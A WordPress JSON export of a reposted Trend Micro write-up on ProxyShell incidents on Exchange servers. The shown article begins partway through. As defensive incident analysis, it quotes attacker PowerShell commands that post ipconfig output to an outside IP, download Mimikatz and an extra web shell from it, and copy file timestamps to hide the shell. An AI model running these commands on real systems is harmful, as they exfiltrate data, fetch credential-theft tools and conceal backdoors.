{"id":43971,"date":"2021-11-17T00:00:00","date_gmt":"2021-11-17T00:00:00","guid":{"rendered":"urn:uuid:234a19b6-a76b-eec1-12d0-1c06d6df6cca"},"modified":"2021-11-17T00:00:00","modified_gmt":"2021-11-17T00:00:00","slug":"analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/","title":{"rendered":"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/k\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/proxyshell-xdr-641.jpg\"><\/p>\n<p>Both servers are using Liferay CE version 6.2, which is vulnerable to <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2020-7961\">CVE-2020-7961<\/a> (possibly leading to remote code execution).<\/p>\n<h2><span class=\"body-subhead-title\">Incident # 2<\/span><\/h2>\n<p>Similar to the first incident, the malicious actor accessed the server via a web shell and then started gathering basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.<\/p>\n<p>Our analysis shows that a Wget request was sent to a URL with a high-numbered port. 
Unfortunately, we don\u2019t have information as to what was downloaded since the URL was already dead by the time of analysis.<\/p>\n<p><span class=\"blockquote\">&#8220;C:\\Windows\\System32\\cmd.exe&#8221; \/c powershell wget http:\/\/209.14.0[.]234:56138\/iMCRufG79yXvYjH0W1SK<\/span><\/p>\n<p>The following commands were executed to gather basic system information:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">cmd.exe \/c ipconfig<\/span><\/li>\n<li><span class=\"rte-red-bullet\">cmd.exe \/c dir<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c ping -n 1 google.com<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c whoami<\/span><\/li>\n<\/ul>\n<p>The web shell was then copied and the original entry deleted using the following commands:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">cmd.exe \/c ren C:\\inetpub\\wwwroot\\aspnet_client\\errorFF.aspx.req errorFF.aspx<\/span><\/li>\n<li><span class=\"rte-red-bullet\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c del &#8220;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorFF.aspx.req&#8221;<\/span><\/li>\n<\/ul>\n<p>The output of the ipconfig command was then sent out as the body of a wget POST request.<\/p>\n<p>The following code shows the PowerShell-encoded (top) and decoded (bottom) commands:<\/p>\n<p><span class=\"blockquote\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA\/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA<\/span><\/p>\n<p><span class=\"blockquote\">$r=ipconfig \/all | out-string;wget -Uri 
http:\/\/91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType &#8220;application\/octet-stream&#8221;<\/span><\/p>\n<p>Mimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:<\/p>\n<p><span class=\"blockquote\">&#8220;c:\\windows\\system32\\cmd.exe&#8221; \/c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=<\/span><\/p>\n<p><span class=\"blockquote\">Invoke-WebRequest -Uri &#8220;http:\/\/91.92.136.250:443\/mimi.exe&#8221; -OutFile &#8220;c:\\windows\\temp\\mimi.exe&#8221;<\/span><\/p>\n<p>The web shell then downloaded an additional .aspx web shell and altered its timestamps to further disguise it in the system, as seen in the following code:<\/p>\n<p><span class=\"blockquote\">Invoke-WebRequest -Uri &#8220;http:\/\/91.92.136.250:443\/out.aspx&#8221; -OutFile &#8220;c:\\windows\\temp\\OutlookCM.aspx&#8221;<\/span><\/p>\n<p>The web shell was then moved to the OWA directory, and its timestamps were set to match those of OutlookCN.aspx in the same directory:<\/p>\n<p><span class=\"blockquote\">$f1=(Get-Item &#8216;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCM.aspx&#8217;); $f2=(Get-Item &#8216;C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookCN.aspx&#8217;); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;<\/span><\/p>\n<p>After a few minutes, additional DLLs were created, which were later verified to be web shell files created by either w3wp.exe or UMWorkerProcess.exe.<\/p>\n<ul>\n<li><span 
class=\"rte-red-bullet\">c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net files\\owa\\8e05b027\\e164d61b\\app_web_ffhsdhdi.dll<\/span><\/li>\n<li><span class=\"rte-red-bullet\">c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\temporary asp.net files\\owa\\8e05b027\\e164d61b\\app_web_m123qbjp.dll<\/span><\/li>\n<\/ul>\n<p>In relation to this incident, we found that the following malicious components and malware were used:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">OutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">App_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">App_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)<\/span><\/li>\n<\/ul>\n<h2><span class=\"body-subhead-title\">Other web shells<\/span><\/h2>\n<p>During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.net page, which is quite unusual since most web shells that we find are written in PHP instead. This is similar to the <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2020\/02\/04\/ghost-in-the-shell-investigating-web-shell-attacks\/\">bespoke web shell<\/a> the KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version of it on the same system.<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/k\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":43972,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9511,9555,9509],"class_list":["post-43971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-cyber-threats","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-11-17T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/k\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/proxyshell-xdr-641.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Analyzing ProxyShell-related Incidents via Trend Micro Managed 
XDR\",\"datePublished\":\"2021-11-17T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\"},\"wordCount\":615,\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg\",\"keywords\":[\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\",\"name\":\"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg\",\"datePublished\":\"2021-11-17T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#primaryimage\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/11\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr.jpg\",\"width\":641,\"height\":350},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/analyzing-proxyshell-related-incidents-via-trend-micro-managed-xdr\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.threatshub.org\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Cyber Threats\",\"item\":\"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-cyber-threats\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal 
\u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/43971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=43971"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/43971\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/43972"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=43971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=43971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=43971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}